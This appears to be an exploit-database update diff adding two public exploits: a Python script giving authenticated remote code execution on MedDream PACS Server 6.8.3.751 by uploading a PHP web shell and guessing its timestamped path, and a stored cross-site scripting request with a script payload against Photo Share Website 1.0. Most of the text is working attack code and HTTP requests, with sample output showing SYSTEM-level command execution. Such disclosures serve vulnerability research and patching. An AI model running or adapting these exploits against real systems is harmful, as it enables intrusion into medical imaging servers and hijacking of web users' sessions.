DB: 2020-10-03

2 changes to exploits/shellcodes

MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)
Photo Share Website 1.0 - Persistent Cross-Site Scripting

exploits/php/webapps/48853.py

@@ -0,0 +1,133 @@
+#!/usr/bin/python
+#
+#
+# Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)
+# Date: 2020-10-01
+# Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/
+# Vendor Homepage: https://www.softneta.com
+# Version: 6.8.3.751
+# Tested On: Windows 2016
+#
+#
+# Timeline
+# 05-02-20: Submitted incident through email, immediate response
+# 05-04-20: Issue resolved, New version released 6.8.3.1.751
+# 
+# Note: Core Vulnerability resides in another product which has been remediated as well
+#
+##PoC##
+#
+# 1. create one line php shell to call commands
+# 2. run script on attacking machine
+# 3. enter parameters; IP, filename, username, password, command
+# 
+#
+# root@kali:~# python meddream.py 
+# Enter IP Address: 192.168.0.223
+# Enter payload filename + .php: cmd.php
+# Enter Username: user1
+# Enter Password: SoSecure!!
+# Enter command: whoami
+# 212357
+# <pre>nt authority\system
+# </pre>
+# http://192.168.0.223/Pacs/upload/20201001-212357--cmd.php?cmd=whoami
+# 404
+# 404
+# 404
+# 404
+# 404
+# 404
+# 404
+# 404
+# 404
+#
+#
+
+from urllib2 import urlopen                        
+from bs4 import BeautifulSoup
+import requests
+import sys
+import time
+from datetime import datetime, timedelta
+
+ip_addr = raw_input("Enter IP Address: ")
+user_file = raw_input("Enter payload filename + .php: ")
+uname = raw_input("Enter Username: ")
+pword = raw_input("Enter Password: ")
+cmd = raw_input("Enter command: ")
+
+URL1= 'http://' + ip_addr + '/Pacs/login.php'
+URL2= 'http://' + ip_addr + '/Pacs/authenticate.php'
+URL3= 'http://' + ip_addr + '/Pacs/uploadImage.php'
+
+def main():
+    session = requests.Session() 
+
+    site = session.get(URL1)
+    
+    soup = BeautifulSoup(site.content, "html.parser")
+    antispam = soup.find("input", {"name":"formAntiSpam"})["value"]
+    dbname = soup.find("input", {"name":"aetitle"})["value"]
+    login_data = {
+    'loginvalue': 'login',
+    'aetitle': dbname,
+    'username': uname,
+    'password': pword,
+    'formAntispam': antispam,
+    'login': 'Login',
+    }
+    
+    r = session.post(URL2, data = login_data)
+   
+
+    files = [
+    ('actionvalue', (None, 'Attach', None)),
+    ('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')),
+    ('action', (None, 'Attach', None)),
+    ]
+
+    r = session.post(URL3, files=files)
+
+    today = datetime.today()
+    upload_date = today.strftime("%Y%m%d")
+
+    less = 1
+    now1 = datetime.now()
+    up_time1 = now1.strftime("%H%M%S")
+    print(up_time1)
+    #varying time checks +/-
+    now2 = now1 - timedelta(seconds=less)
+    up_time2 = now2.strftime("%H%M%S")
+    now3 = now2 - timedelta(seconds=less)
+    up_time3 = now3.strftime("%H%M%S")
+    now4 = now3 - timedelta(seconds=less)
+    up_time4 = now4.strftime("%H%M%S")
+    now5 = now4 - timedelta(seconds=less)
+    up_time5 = now5.strftime("%H%M%S")
+    now6 = now5 - timedelta(seconds=less)
+    up_time6 = now6.strftime("%H%M%S")
+    now7 = now6 - timedelta(seconds=less)
+    up_time7 = now7.strftime("%H%M%S")
+    now8 = now1 + timedelta(seconds=less)
+    up_time8 = now8.strftime("%H%M%S")
+    now9 = now8 + timedelta(seconds=less)
+    up_time9 = now8.strftime("%H%M%S")
+    now10 = now1 + timedelta(seconds=less)
+    up_time10 = now9.strftime("%H%M%S")
+
+
+    up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10]  
+    for i in up_time_array: 
+        r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd)
+        if r.status_code == 200: 
+            print r.content
+            print r.url
+        else:
+            print ("404")
+
+if __name__ == '__main__':
+    main()

exploits/php/webapps/48854.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Photo Share Website 1.0 - Persistent Cross-Site Scripting
+# Date: 2020-09-30
+# Exploit Author: Augkim
+# Vendor Homepage: https://www.sourcecodester.com/php/14478/photo-share-website-using-phpmysql-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/photo-share-website-using-php.zip
+# Tested on: Linux Apache2
+
+
+POST /soci/ajax.php?action=save_comment HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0)
+Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 45
+DNT: 1
+Connection: close
+Referer: http://localhost/soci/index.php?page=home
+Cookie: mode=day; src=1;
+BEEFHOOK=0hqrkHLyTmW38TaPrDHRUW4LsDpXKDSSqAQf54dt0hIA0wFNpjkoJYFlnGhoKw2T4qQHIUZ5oESFGSVW;
+PHPSESSID=cq8j6ug2vem0obmno6fi0h9404; access=1
+Origin: foo.example.org
+
+PoC:
+post_id=4&comment="><script>alert(2)</script>

files_exploits.csv

@@ -42991,6 +42991,8 @@ id,file,description,date,author,type,platform,port
 48652,exploits/hardware/webapps/48652.txt,"SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin)",2020-07-08,"Metin Yunus Kandemir",webapps,hardware,
 48653,exploits/hardware/webapps/48653.txt,"BSA Radar 1.6.7234.24750 - Cross-Site Request Forgery (Change Password)",2020-07-08,"William Summerhill",webapps,hardware,
 48654,exploits/java/webapps/48654.txt,"Exhibitor Web UI 1.7.1 - Remote Code Execution",2020-07-07,"Logan Sanderson",webapps,java,
+48853,exploits/php/webapps/48853.py,"MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)",2020-10-02,bzyo,webapps,php,
+48854,exploits/php/webapps/48854.txt,"Photo Share Website 1.0 - Persistent Cross-Site Scripting",2020-10-02,Augkim,webapps,php,
 48655,exploits/php/webapps/48655.php,"PHP 7.4 FFI - 'disable_functions' Bypass",2020-07-07,"hunter gregal",webapps,php,
 48656,exploits/php/webapps/48656.txt,"Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting",2020-07-09,mqt,webapps,php,
 48659,exploits/asp/webapps/48659.txt,"HelloWeb 2.0 - Arbitrary File Download",2020-07-10,bRpsd,webapps,asp,